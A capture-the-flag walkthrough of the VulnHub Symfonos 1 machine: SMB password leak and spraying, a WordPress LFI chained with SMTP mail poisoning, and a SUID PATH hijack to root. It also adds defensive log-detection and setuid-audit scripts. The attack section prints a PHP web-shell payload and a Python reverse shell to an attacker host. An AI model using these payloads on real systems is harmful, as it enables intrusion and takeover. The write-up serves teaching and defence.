
https://www.vulnhub.com/entry/symfonos-1,322/

The box has an anonymous SMB share that leaks a handful of passwords, which we spray against the known users. This gives us the helios credentials and access to the helios share, which points to a WordPress site. The WordPress site runs plugins vulnerable to local file inclusion (LFI); combined with the open SMTP service (mail poisoning), this gives us a shell on the box. Finally, a SUID binary calls curl by a relative path, so hijacking PATH yields root.

Nmap Scan

# Nmap 7.60 scan initiated Mon Oct 11 11:27:46 2021 as: **nmap -sC -sV -A -o nmap --min-rate=5000 192.168.10.80**
Nmap scan report for 192.168.10.80
Host is up (0.012s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
**22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)**
| ssh-hostkey:
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (EdDSA)
**25/tcp  open  smtp        Postfix smtpd**
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
**80/tcp  open  http        Apache httpd 2.4.25 ((Debian))**
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
**139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)**
**445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)**
MAC Address: 08:00:27:37:CE:1A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2021-10-11T00:43:00-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-10-11 11:28:00
|_  start_date: 1601-01-01 05:41:16

TRACEROUTE
HOP RTT      ADDRESS
1   11.61 ms 192.168.10.80

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 11 11:28:21 2021 -- 1 IP address (1 host up) scanned in 35.98 seconds

HTTP

Port 80 serves a static page that is of no use. Directory enumeration provides no additional information.

SMB

Note: the target's IP changed (DHCP), so it is 192.168.10.68 from here on.

 smbclient -L \\192.168.10.68\

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\roshan's password:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        **helios          Disk      Helios personal share**
        **anonymous       Disk**
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP

Anonymous share

 smbclient \\\\192.168.10.68\\anonymous

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\roshan's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 06:59:49 2019
  ..                                  D        0  Sat Jun 29 06:57:15 2019
  attention.txt                       N      154  Sat Jun 29 06:59:49 2019

                19994224 blocks of size 1024. 17238604 blocks available

Content of attention.txt

 cat attention.txt

Can users please stop using passwords like **'epidioko', 'qwerty' and 'baseball'!**

Next person I find using one of these passwords will be fired!

-Zeus

The note gives three candidate passwords: epidioko, qwerty and baseball.

It also gives candidate usernames, from the share name and the signature: helios and zeus.

Helios Share

Both shares are read-only.

Spraying the three passwords against the two users shows that the password of helios is qwerty.

 smbclient \\\\192.168.10.68\\Helios -U Helios

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\Helios's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 06:17:05 2019
  ..                                  D        0  Mon Oct 18 18:22:56 2021
  **research.txt                        A      432  Sat Jun 29 06:17:05 2019
  todo.txt                            A       52  Sat Jun 29 06:17:05 2019**

Contents of the files

 cat todo.txt research.txt

1. Binge watch Dexter
2. Dance
**3. Work on /h3l105**

Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World

todo.txt points us to a new web path: /h3l105

/h3l105

This is a WordPress site, so let's run wpscan:

$ wpscan --url http://symfonos.local/h3l105/ -e ap,u

-e selects what to enumerate: ap = all plugins, u = all users.

This identifies two plugins, both with publicly known LFI vulnerabilities. wpscan reports them as "up to date" only because neither plugin has been updated since the affected version was released.

[i] Plugin(s) Identified:

**[+] mail-masta**
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 **| Latest Version: 1.0 (up to date)**
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

**[+] site-editor**
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 **| Latest Version: 1.1.1 (up to date)**
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

LFI to RCE

The LFI lets us include arbitrary local files, so the goal is to find a file whose contents we control and that contains PHP code. I tried various files that might hold such code, without success.

Then I realized that port 25 (SMTP) is open: mail sent to a local user is delivered to that user's mailbox on disk, and the LFI can read that mailbox.

Sending malicious content in the mail

telnet symfonos.local 25
MAIL FROM:test
RCPT TO:helios
data
<?php system($_GET['cmd']); ?>
.
quit

The helios mailbox (/var/mail/helios) now contains the PHP payload. Including it through the LFI in mail-masta executes the payload, with the command taken from the cmd parameter we supply:

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.67",8181));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

(Shown URL-decoded; the browser percent-encodes the spaces and quotes when the request is sent.)

The pl parameter is the file the plugin includes, in this case the helios mailbox.

The cmd parameter is what our injected system() call runs, in this case a Python reverse shell back to 192.168.10.67:8181, where a listener is waiting.
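From the defender's side, the whole chain above (mail poisoning plus an LFI parameter pointing at the spool) leaves two traces: a request whose file parameter names a mail spool or uses traversal, and a mailbox containing a PHP open tag. The following script is an added example, not part of the original write-up; it parses constructed Apache combined-format access-log lines, flags request parameters that look like LFI abuse (absolute or sensitive paths, traversal, shell fragments in a `cmd`-style value), and checks a constructed mbox text for injected PHP. The parameter names, log lines and mail headers are all made up for the example.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Prefix of an Apache "combined" access-log line (constructed sample lines below follow it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Files a "which file should the plugin load" parameter should never point at.
SENSITIVE_PREFIXES = ("/var/mail/", "/var/spool/mail/", "/var/log/", "/etc/", "/proc/", "php://", "data:")
# Fragments typical of an injected command (shell spawns, reverse-shell one-liners).
SHELL_RE = re.compile(r"/bin/(?:ba)?sh|subprocess|socket\.socket|\bbash -i\b|\bnc\b|\bperl -e\b|\bpython -c\b")
# PHP open tags have no business inside a mail spool.
PHP_TAG_RE = re.compile(r"<\?php|<\?=")


def query_params(uri):
    """Split the query string on '&' only (never ';', which payloads use freely)."""
    for pair in urlsplit(uri).query.split("&"):
        if pair:
            name, _, raw = pair.partition("=")
            yield unquote_plus(name), unquote_plus(raw)


def analyse_request(uri):
    """Return the reasons (possibly none) why one request URI looks like LFI abuse."""
    reasons = []
    for name, value in query_params(uri):
        value = unquote(value)  # second decode pass catches double-encoded payloads
        if ".." in value.replace("\\", "/").split("/"):
            reasons.append(f"directory traversal in {name}")
        if value.startswith(SENSITIVE_PREFIXES):
            reasons.append(f"sensitive file in {name}")
        elif value.startswith("/"):
            reasons.append(f"absolute path in {name}")
        if SHELL_RE.search(value):
            reasons.append(f"command payload in {name}")
    return reasons


def scan_log(lines):
    """Parse access-log lines and return one finding per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        reasons = analyse_request(m["uri"])
        if reasons:
            findings.append({"ip": m["ip"], "time": m["ts"], "uri": m["uri"],
                             "status": int(m["status"]), "reasons": reasons})
    return findings


def mail_spool_has_php(text):
    """Return the 1-based line numbers of a mailbox text that carry a PHP open tag."""
    return [n for n, line in enumerate(text.splitlines(), 1) if PHP_TAG_RE.search(line)]


# Constructed sample log: two benign requests, one traversal attempt, one spool-include with a command.
SAMPLE_LOG = [
    '192.168.10.67 - - [18/Oct/2021:18:31:02 +0530] "GET /h3l105/ HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '192.168.10.67 - - [18/Oct/2021:18:31:40 +0530] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=campaign HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.168.10.67 - - [18/Oct/2021:18:32:11 +0530] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../../etc/passwd HTTP/1.1" 200 1807 "-" "Mozilla/5.0"',
    '192.168.10.67 - - [18/Oct/2021:18:33:05 +0530] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket();s.connect((%22192.168.10.67%22,8181));subprocess.call([%22/bin/sh%22,%22-i%22])%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
# Constructed mbox fragment as Postfix would leave it after the telnet session above.
SAMPLE_MAIL = """From test  Mon Oct 18 18:30:00 2021
Return-Path: <test>
X-Original-To: helios
Delivered-To: helios@symfonos.localdomain

<?php system($_GET['cmd']); ?>
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], ", ".join(f["reasons"]))
    print("PHP in mail spool at lines:", mail_spool_has_php(SAMPLE_MAIL))
```

Run against a real access log, the same two functions apply unchanged; the point of splitting on `&` by hand is that the reverse-shell payload is full of semicolons, which some query parsers also treat as separators and would scatter across bogus parameter names.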

Inside the box

Listing SUID binaries shows one that is not part of a standard Debian install:

helios@symfonos:/home/helios$ find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
**/opt/statuscheck**
/bin/mount
/bin/umount
/bin/su
/bin/ping

/opt/statuscheck is not a standard system binary, so let's have a look at it.

**helios@symfonos:/opt$ file statuscheck**
statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
**helios@symfonos:/opt$ strings statuscheck**
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
**curl -I H
http://lH
ocalhostH**
AWAVA
AUATL
[]A\A]A^A_
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
prog.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

The binary imports system and embeds the command "curl -I http://localhost" (split across three entries in the strings output). system() runs the command through /bin/sh, which looks curl up on PATH, and the setuid binary does nothing to sanitize PATH. So we can place our own curl earlier in PATH and have it executed as root.

helios@symfonos:/tmp$ cat curl
/bin/bash -p
helios@symfonos:/tmp$ PATH=$(pwd):$PATH
helios@symfonos:/tmp$ /opt/statuscheck
**bash-4.4# id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)**
bash-4.4# ls -la /root/
total 24
drwx------  2 root root 4096 Jun 28  2019 .
drwxr-xr-x 22 root root 4096 Jun 28  2019 ..
lrwxrwxrwx  1 root root    9 Jun 28  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Jun 28  2019 .selected_editor
**-rw-r--r--  1 root root 1735 Jun 28  2019 proof.txt**

Mitigations

Restrict the SMB shares: do not allow anonymous (guest) access, and do not leave notes containing credentials on shares.

In setuid binaries, invoke helper programs by absolute path and never trust the caller's PATH (or any other environment variable).
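A quick way to check the second mitigation across a system is to list setuid binaries (as the `find / -perm /4000` above does) and look for the same two signs that gave statuscheck away: an import of a PATH-resolving libc function (system, popen, execvp, ...) together with an embedded command line whose program name has no directory. The script below is an added example and not part of the write-up; `extract_strings` is a minimal re-implementation of strings(1), the regular expression for "looks like a relative command line" is a heuristic of my own, and `FAKE_STATUSCHECK` is a constructed byte blob that reproduces the relevant strings from the page rather than the real binary.

```python
import os
import re
import stat

# libc entry points that hand a command line to a shell or resolve a program name via PATH.
PATH_RESOLVING_IMPORTS = {"system", "popen", "execvp", "execvpe", "execlp"}
# Heuristic: "<bare program name> <flag or path/URL ...>" with no directory on the program.
RELATIVE_CMD_RE = re.compile(r"^[a-z][a-z0-9_.+-]*\s+(?:-\S*|\S*[/:]\S*)")


def extract_strings(data, min_len=4):
    """Minimal strings(1): runs of at least min_len printable ASCII bytes."""
    found, run = [], bytearray()
    for byte in data:
        if 0x20 <= byte <= 0x7E or byte == 0x09:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def audit_strings(strings):
    """Which PATH-resolving imports a binary uses, and which embedded command lines
    name their program without a directory (symbol versions like name@@GLIBC_x are stripped)."""
    imports = sorted({s.split("@")[0] for s in strings} & PATH_RESOLVING_IMPORTS)
    relative = [s for s in strings if RELATIVE_CMD_RE.match(s)]
    return {"path_resolving_imports": imports, "relative_commands": relative}


def is_risky(strings):
    """Flag only the combination: shells out AND names a helper by a bare name."""
    report = audit_strings(strings)
    return bool(report["path_resolving_imports"] and report["relative_commands"])


def find_setuid(root="/"):
    """Regular files under root with the setuid bit set (like find / -perm /4000)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def audit_file(path):
    with open(path, "rb") as fh:
        return audit_strings(extract_strings(fh.read()))


# Constructed stand-in for /opt/statuscheck: the telling strings from the page, NUL-separated,
# behind a fake ELF magic (the real binary is not reproduced here).
FAKE_STATUSCHECK = b"\x7fELF\x00" + b"\x00".join([
    b"libc.so.6", b"system", b"__cxa_finalize", b"curl -I H", b"http://lH", b"ocalhostH",
    b"GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516", b"prog.c", b"system@@GLIBC_2.2.5",
]) + b"\x00"
# The same program after the mitigation: curl invoked by absolute path.
FIXED_STRINGS = ["libc.so.6", "system", "/usr/bin/curl -I http://localhost", "prog.c"]

if __name__ == "__main__":
    for path in find_setuid("/"):
        report = audit_file(path)
        if report["path_resolving_imports"] and report["relative_commands"]:
            print(path, report)
```

The heuristic will miss command lines the compiler stores as immediates, which is exactly what happened to "curl -I http://localhost" in the page's strings output; it still catches the case because the first fragment, "curl -I H", is intact. Treat a hit as a prompt to disassemble, not as proof.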